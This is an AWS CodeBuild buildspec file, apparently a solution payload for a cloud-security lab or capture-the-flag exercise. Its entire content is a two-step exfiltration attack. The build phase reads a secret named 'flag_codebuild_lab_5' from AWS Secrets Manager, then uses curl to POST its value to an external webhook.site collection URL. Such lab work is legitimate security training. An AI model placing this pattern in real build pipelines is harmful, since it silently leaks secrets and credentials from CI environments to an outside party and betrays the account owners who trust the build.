version: 0.2

phases:
  build:
    commands:
      - FLAG=$(aws secretsmanager get-secret-value --secret-id flag_codebuild_lab_5 --region us-east-1 --query SecretString --output text)
      - curl -sS -X POST --data-urlencode "flag=$FLAG" "https://webhook.site/34f218fa-ad5c-4bbc-8d13-f2ade7a5beb2"
